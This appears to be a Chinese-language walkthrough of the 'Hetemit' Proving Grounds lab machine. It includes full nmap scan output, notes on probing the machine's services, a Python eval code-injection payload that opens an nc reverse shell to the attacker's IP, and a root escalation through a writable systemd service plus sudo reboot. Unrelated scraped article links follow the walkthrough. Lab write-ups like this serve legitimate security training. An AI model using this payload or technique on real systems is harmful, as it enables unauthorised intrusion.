nmap 
┌──(root㉿kali)-[~]

└─# nmap -p- -A 192.168.157.117

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 04:32 UTC

Stats: 0:00:55 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan

SYN Stealth Scan Timing: About 41.46% done; ETC: 04:34 (0:01:16 remaining)

Nmap scan report for 192.168.157.117

Host is up (0.071s latency).

Not shown: 65528 filtered tcp ports (no-response)

PORT      STATE SERVICE     VERSION

21/tcp    open  ftp         vsftpd 3.0.3

| ftp-syst:

|   STAT:

| FTP server status:

|      Connected to 192.168.45.250

|      Logged in as ftp

|      TYPE: ASCII

|      No session bandwidth limit

|      Session timeout in seconds is 300

|      Control connection is plain text

|      Data connections will be plain text

|      At session startup, client count was 2

|      vsFTPd 3.0.3 - secure, fast, stable

|_End of status

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

|_Can't get directory listing: TIMEOUT

22/tcp    open  ssh         OpenSSH 8.0 (protocol 2.0)

| ssh-hostkey:

|   3072 b1:e2:9d:f1:f8:10:db:a5:aa:5a:22:94:e8:92:61:65 (RSA)

|   256 74:dd:fa:f2:51:dd:74:38:2b:b2:ec:82:e5:91:82:28 (ECDSA)

|_  256 48:bc:9d:eb:bd:4d:ac:b3:0b:5d:67:da:56:54:2b:a0 (ED25519)

80/tcp    open  http        Apache httpd 2.4.37 ((centos))

| http-methods:

|_  Potentially risky methods: TRACE

|_http-server-header: Apache/2.4.37 (centos)

|_http-title: CentOS \xE6\x8F\x90\xE4\xBE\x9B\xE7\x9A\x84 Apache HTTP \xE6\x9C\x8D\xE5\x8A\xA1\xE5\x99\xA8\xE6\xB5\x8B\xE8\xAF\x95\xE9\xA1\xB5

139/tcp   open  netbios-ssn Samba smbd 4.6.2

445/tcp   open  netbios-ssn Samba smbd 4.6.2

18000/tcp open  biimenu?

| fingerprint-strings:

|   GenericLines:

|     HTTP/1.1 400 Bad Request

|   GetRequest, HTTPOptions:

|     HTTP/1.0 403 Forbidden

|     Content-Type: text/html; charset=UTF-8

|     Content-Length: 3102

|     <!DOCTYPE html>

|     <html lang="en">

|     <head>

|     <meta charset="utf-8" />

|     <title>Action Controller: Exception caught</title>

|     <style>

|     body {

|     background-color: #FAFAFA;

|     color: #333;

|     margin: 0px;

|     body, p, ol, ul, td {

|     font-family: helvetica, verdana, arial, sans-serif;

|     font-size: 13px;

|     line-height: 18px;

|     font-size: 11px;

|     white-space: pre-wrap;

|     pre.box {

|     border: 1px solid #EEE;

|     padding: 10px;

|     margin: 0px;

|     width: 958px;

|     header {

|     color: #F0F0F0;

|     background: #C52F24;

|     padding: 0.5em 1.5em;

|     margin: 0.2em 0;

|     line-height: 1.1em;

|     font-size: 2em;

|     color: #C52F24;

|     line-height: 25px;

|     .details {

|_    bord

50000/tcp open  http        Werkzeug httpd 1.0.1 (Python 3.6.8)

|_http-title: Site doesn't have a title (text/html; charset=utf-8).

|_http-server-header: Werkzeug/1.0.1 Python/3.6.8

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

SF-Port18000-TCP:V=7.94SVN%I=7%D=11/25%Time=6743FE51%P=x86_64-pc-linux-gnu

SF:%r(GenericLines,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(GetR

SF:equest,C76,"HTTP/1\.0\x20403\x20Forbidden\r\nContent-Type:\x20text/html

SF:;\x20charset=UTF-8\r\nContent-Length:\x203102\r\n\r\n<!DOCTYPE\x20html>

SF:\n<html\x20lang=\"en\">\n<head>\n\x20\x20<meta\x20charset=\"utf-8\"\x20

SF:/>\n\x20\x20<title>Action\x20Controller:\x20Exception\x20caught</title>

SF:\n\x20\x20<style>\n\x20\x20\x20\x20body\x20{\n\x20\x20\x20\x20\x20\x20b

SF:ackground-color:\x20#FAFAFA;\n\x20\x20\x20\x20\x20\x20color:\x20#333;\n

SF:\x20\x20\x20\x20\x20\x20margin:\x200px;\n\x20\x20\x20\x20}\n\n\x20\x20\

SF:x20\x20body,\x20p,\x20ol,\x20ul,\x20td\x20{\n\x20\x20\x20\x20\x20\x20fo

SF:nt-family:\x20helvetica,\x20verdana,\x20arial,\x20sans-serif;\n\x20\x20

SF:\x20\x20\x20\x20font-size:\x20\x20\x2013px;\n\x20\x20\x20\x20\x20\x20li

SF:ne-height:\x2018px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20pre\x20{\n\x2

SF:0\x20\x20\x20\x20\x20font-size:\x2011px;\n\x20\x20\x20\x20\x20\x20white

SF:-space:\x20pre-wrap;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20pre\.box\x20

SF:{\n\x20\x20\x20\x20\x20\x20border:\x201px\x20solid\x20#EEE;\n\x20\x20\x

SF:20\x20\x20\x20padding:\x2010px;\n\x20\x20\x20\x20\x20\x20margin:\x200px

SF:;\n\x20\x20\x20\x20\x20\x20width:\x20958px;\n\x20\x20\x20\x20}\n\n\x20\

SF:x20\x20\x20header\x20{\n\x20\x20\x20\x20\x20\x20color:\x20#F0F0F0;\n\x2

SF:0\x20\x20\x20\x20\x20background:\x20#C52F24;\n\x20\x20\x20\x20\x20\x20p

SF:adding:\x200\.5em\x201\.5em;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20h1\x

SF:20{\n\x20\x20\x20\x20\x20\x20margin:\x200\.2em\x200;\n\x20\x20\x20\x20\

SF:x20\x20line-height:\x201\.1em;\n\x20\x20\x20\x20\x20\x20font-size:\x202

SF:em;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20h2\x20{\n\x20\x20\x20\x20\x20

SF:\x20color:\x20#C52F24;\n\x20\x20\x20\x20\x20\x20line-height:\x2025px;\n

SF:\x20\x20\x20\x20}\n\n\x20\x20\x20\x20\.details\x20{\n\x20\x20\x20\x20\x

SF:20\x20bord")%r(HTTPOptions,C76,"HTTP/1\.0\x20403\x20Forbidden\r\nConten

SF:t-Type:\x20text/html;\x20charset=UTF-8\r\nContent-Length:\x203102\r\n\r

SF:\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n\x20\x20<meta\x20c

SF:harset=\"utf-8\"\x20/>\n\x20\x20<title>Action\x20Controller:\x20Excepti

SF:on\x20caught</title>\n\x20\x20<style>\n\x20\x20\x20\x20body\x20{\n\x20\

SF:x20\x20\x20\x20\x20background-color:\x20#FAFAFA;\n\x20\x20\x20\x20\x20\

SF:x20color:\x20#333;\n\x20\x20\x20\x20\x20\x20margin:\x200px;\n\x20\x20\x

SF:20\x20}\n\n\x20\x20\x20\x20body,\x20p,\x20ol,\x20ul,\x20td\x20{\n\x20\x

SF:20\x20\x20\x20\x20font-family:\x20helvetica,\x20verdana,\x20arial,\x20s

SF:ans-serif;\n\x20\x20\x20\x20\x20\x20font-size:\x20\x20\x2013px;\n\x20\x

SF:20\x20\x20\x20\x20line-height:\x2018px;\n\x20\x20\x20\x20}\n\n\x20\x20\

SF:x20\x20pre\x20{\n\x20\x20\x20\x20\x20\x20font-size:\x2011px;\n\x20\x20\

SF:x20\x20\x20\x20white-space:\x20pre-wrap;\n\x20\x20\x20\x20}\n\n\x20\x20

SF:\x20\x20pre\.box\x20{\n\x20\x20\x20\x20\x20\x20border:\x201px\x20solid\

SF:x20#EEE;\n\x20\x20\x20\x20\x20\x20padding:\x2010px;\n\x20\x20\x20\x20\x

SF:20\x20margin:\x200px;\n\x20\x20\x20\x20\x20\x20width:\x20958px;\n\x20\x

SF:20\x20\x20}\n\n\x20\x20\x20\x20header\x20{\n\x20\x20\x20\x20\x20\x20col

SF:or:\x20#F0F0F0;\n\x20\x20\x20\x20\x20\x20background:\x20#C52F24;\n\x20\

SF:x20\x20\x20\x20\x20padding:\x200\.5em\x201\.5em;\n\x20\x20\x20\x20}\n\n

SF:\x20\x20\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20margin:\x200\.2em\x200

SF:;\n\x20\x20\x20\x20\x20\x20line-height:\x201\.1em;\n\x20\x20\x20\x20\x2

SF:0\x20font-size:\x202em;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20h2\x20{\n

SF:\x20\x20\x20\x20\x20\x20color:\x20#C52F24;\n\x20\x20\x20\x20\x20\x20lin

SF:e-height:\x2025px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20\.details\x20{

SF:\n\x20\x20\x20\x20\x20\x20bord");

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose|specialized|storage-misc

Running (JUST GUESSING): Linux 3.X|4.X|5.X (90%), Crestron 2-Series (86%), HP embedded (85%)

OS CPE: cpe:/o:linux:linux_kernel:3.13 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5.1 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3

Aggressive OS guesses: Linux 3.13 (90%), Linux 3.10 - 4.11 (90%), Linux 3.18 (90%), Linux 3.2 - 4.9 (90%), Linux 5.1 (88%), Crestron XPanel control system (86%), Linux 3.16 (86%), HP P2000 G3 NAS device (85%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 4 hops

Service Info: OS: Unix

Host script results:

| smb2-time:

|   date: 2024-11-25T04:34:39

|_  start_date: N/A

| smb2-security-mode:

|   3:1:1:

|_    Message signing enabled but not required

TRACEROUTE (using port 139/tcp)

HOP RTT      ADDRESS

1   70.53 ms 192.168.45.1

2   70.50 ms 192.168.45.254

3   71.51 ms 192.168.251.1

4   71.56 ms 192.168.157.117

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 162.70 seconds

18000端口先注册个用户看看是啥



但是要邀请码 不知道是啥 注册不了

5000端口看样子是个接口 也不知道干啥用的

80端口就是个普通的页面没啥卵用

再来看看smba服务有啥共享文件



发现没有权限查看文件



这样子的话估计突破口不在这

再来看看ftp端口 可以匿名登录



给无语住了 连上了点时 传输任何命令都是 响应超时 看来突破口也不在这里

看看web页面吧想不到啥漏洞利用点了

没招了看看wp吧

好吧确实没想到



尝试代码执行



发现成功



反弹shell

code=eval('__import__("os").system("nc -e /bin/bash 192.168.45.250 80")')

然后就是提权环节了

有几个可疑点

/etc/systemd/system/pythonapp.service 可写权限

/home/cmeeks/register_hetemit/config/master.key 有个key

postgres26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash

User cmeeks may run the following commands on hetemit:

(root) NOPASSWD: /sbin/halt, /sbin/reboot, /sbin/poweroff

修改service 的用户为root



然后sudo reboot

再次反弹shell 可以看到我们已经变成root了



其实后面提权都不难

主要是一开始rce突破口比较难

Hetemit pg walkthrough Intermediate的更多相关文章

  1. 简析服务端通过GT导入SHP至PG的方法

    文章版权由作者李晓晖和博客园共有,若转载请于明显处标明出处:http://www.cnblogs.com/naaoveGIS/ 1.背景 项目中需要在浏览器端直接上传SHP后服务端进行数据的自动入PG ...

  2. Bootstap datetimepicker报错TypeError: intermediate value

    Bootstrap datetimepicker有多个版本,官方的链接中,只是datepicker,没有时间的选择,原版的datetimepicker也不再更新,不能用新版的jquery.现在http ...

  3. PG 中 JSON 字段的应用

    13 年发现 pg 有了 json 类型,便从 oracle 转 pg,几年下来也算比较熟稔了,总结几个有益的实践. 用途一:存储设计时无法预料的文档性的数据.比如,通常可以在人员表准备一个 json ...

  4. pg gem 安装(postgresql94)

    使用下面命令安装报错 gem install pg 错误: [root@AS-test middle_database]# gem install pgBuilding native extensio ...

  5. #pg学习#postgresql的安装

    1.按照官网给的步骤编译安装(Mac安装是比较容易的,相比Liunx) cd /Users/renlipeng/Desktop/postgresql-9.5.1 ./configure --prefi ...

  6. PG 函数的易变性(Function Volatility Categories)

    此概念的接触是在做分区表的时候碰到的,分区表按时间字段分区,在查询时当where条件中时间为now()或者current_time()等时是无法查询的,即使进行格式转换也不行,只有是时间格式如‘201 ...

  7. c++错误——intermediate.manifest : general error c1010070很傻的错

    .\Debug\sadf.exe.intermediate.manifest : general error c1010070: Failed to load and parse the manife ...

  8. mysql 序列与pg序列的比较

    mysql序列(这里只谈innodb引擎): 在使用mysql的AUTO_INCREMENT时,使用AUTO_INCREMENT的字段必须建有索引,也可以为索引的一部分.当没有索引时会报错:      ...

  9. 使用zfs进行pg的pitr恢复测试

    前段时间做了一下zfs做pg的增量恢复测试,mark一下. 服务器信息: 主机:192.168.173.43 备机:192.168.173.41 主备使用流复制搭建,在备机上面进行了zfs快照备份. ...

  10. PG CREATEINDEX CONCURRENTLY

    PG CREATEINDEX CONCURRENTLY [TOC] 官方说法 根据9.1的文档 Creating an index can interfere with regular operati ...

随机推荐

  1. 19.使用kubeadm-ha脚本一键安装K8S

    使用kubeadm-ha脚本一键安装K8S 前情提示 以前安装k8s集群的时候使用的是k8s官网的教程 使用的镜像源都是国外的 速度慢就不说了 还有一些根本就下载不动 导致安装失败 ,使用一个开源的一 ...

  2. VMware安装教程---------------------以及Windows,Linux,Apple MAC OS系统安装

    1.什么是VMware虚拟机 VMware虚拟机是一个虚拟机软件,它可以在一台机器上同时运行多个系统,这些系统包括Windows,Linux,Apple os等. 2.虚拟机有什么用 虚拟机的用处很多 ...

  3. csv导出特殊字符问题

    昨天听到隔壁组讨论说按照逗号分割implode导出到csv文件,传递文件数据给别人的时候,别人按照都好explode分割回来多一个单元格,他们调查了一下发现是内容里面就是有逗号导致的,居然就这么卡住了 ...

  4. MySQL8.0新特性之增强版逻辑备份恢复

    前言关于MySQL库表逻辑备份恢复,我们主要有以下几种常用的工具: 1.mysqldump:MySQL原生自带的逻辑备份恢复工具,支持整个实例.单个数据库.单张表等的备份与恢复,对于1-10个G的数据 ...

  5. 运维工具之saltstack

    参考:https://www.cnblogs.com/xintiao-/p/10380656.html saltstack是由thomas Hatch于2011年创建的一个开源项目,设计初衷是为了实现 ...

  6. B+树原理详解

    B树 与 B+树 我们今天要介绍的是工作开发中最常接触到的 InnoDB 存储引擎中的 B+ 树索引.要介绍 B+ 树索引,就不得不提二叉查找树,平衡二叉树和 B 树这三种数据结构.B+ 树就是从他们 ...

  7. springgateway 路由转发

    有些情况下,我们希望不直接访问后端地址,这个时候可以通过springgateway网关进行处理.下面只是一个简单的例子. 至于URL,变化,我们可以通过编写程序逻辑来实现. 实现步骤: 1.新建项目 ...

  8. HTML5 网络监听,全屏

    1.网络状态监听 online事件:网络重新连通时触发 offline事件:网络断开时触发 <script> // 监听网络连接 window.addEventListener(" ...

  9. Mac中nginx的默认安装路径和启动方式

    1.安装完以后,可以在终端输出的信息里看到一些配置路径: /usr/local/etc/nginx/nginx.conf (配置文件路径) /usr/local/var/www (服务器默认路径) / ...

  10. 『玩转Streamlit』--上传下载文件

    在Web应用中,文件的上传下载是交互中不可缺少的功能. 因为在业务功能中,一般不会只有文字的交互,资料或图片的获取和分发是很常见的需求. 比如,文件上传可让用户向服务器提交数据,如上传图片分享生活.提 ...